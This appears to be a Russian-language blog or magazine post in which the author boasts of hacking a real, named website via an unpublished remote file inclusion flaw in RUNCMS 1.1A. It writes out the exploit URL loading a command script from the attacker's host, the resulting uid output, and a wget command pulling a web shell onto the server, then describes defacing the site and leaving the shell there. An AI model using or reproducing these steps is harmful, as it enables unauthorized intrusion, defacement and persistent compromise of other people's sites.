Всё началось с того что мой знакомый, нашёл уязвимость в модуле движка RUNCMS 1.1A. Это ОЧЕНЬ раскрученный и можно сказать известный движок в инете. Подумав сколько сайтов может «лечь» от этой баги, я не стал кидать информацию про эту багу на паблик. Задействовав всеми любимый
Гугл запросом «Powered by RUNCMS 1.1A», я увидел огромнейшее количество потенциально уязвимых сайтов.
После просмотра адресов первых сайтов, которые мне выдал поисковик, был выбран сайт
www.multicolor.ru. Составив ссылку вида:

http://www.multicolor.ru/modules/newbb_plus/class/ forumpollrenderer.php?bbPath[path]=http://
mysite.ru/cmd.php&cmd=id 

я с чувством радости увидел свои права:

uid=7609(multicolorru)
gid=7609(multicolorru) 
groups=7609(multicolorru)

Далее я узнал, что на сервере имеется утилита
wget. Команда wget http://www.mysite/shell.php сработала на ура, и веб-шелл от rush security team был уже доступен по адресу
http://www.multicolor.ru/modules/ newbb_plus/class/shell.php. Я был в директории
/home/multicolorru/www/ modules/newbb_plus/class. Перейдя на пару дир выше, я оказался в
/home/multicolorru/www. Там то и лежал нужный нам index.php :). Закачав на сервак нужную мне картинку,
я совершил красочный дефейс :)) Зайдя на сайт через несколько дней
я увидел, что дефейс так и висит на сайте (висит
и сейчас)! Про то, что там так и находится шелл от rst, я и не говорю…. 

Подведя небольшие итоги, я могу сказать, что бага в
RUNCMS является довольно «убойной» и на паблике пока информации про неё не было. На этой cms крутится много сайтов и
не исключенно, что начнётся целая волна взломов этого движка….



Оставить мнение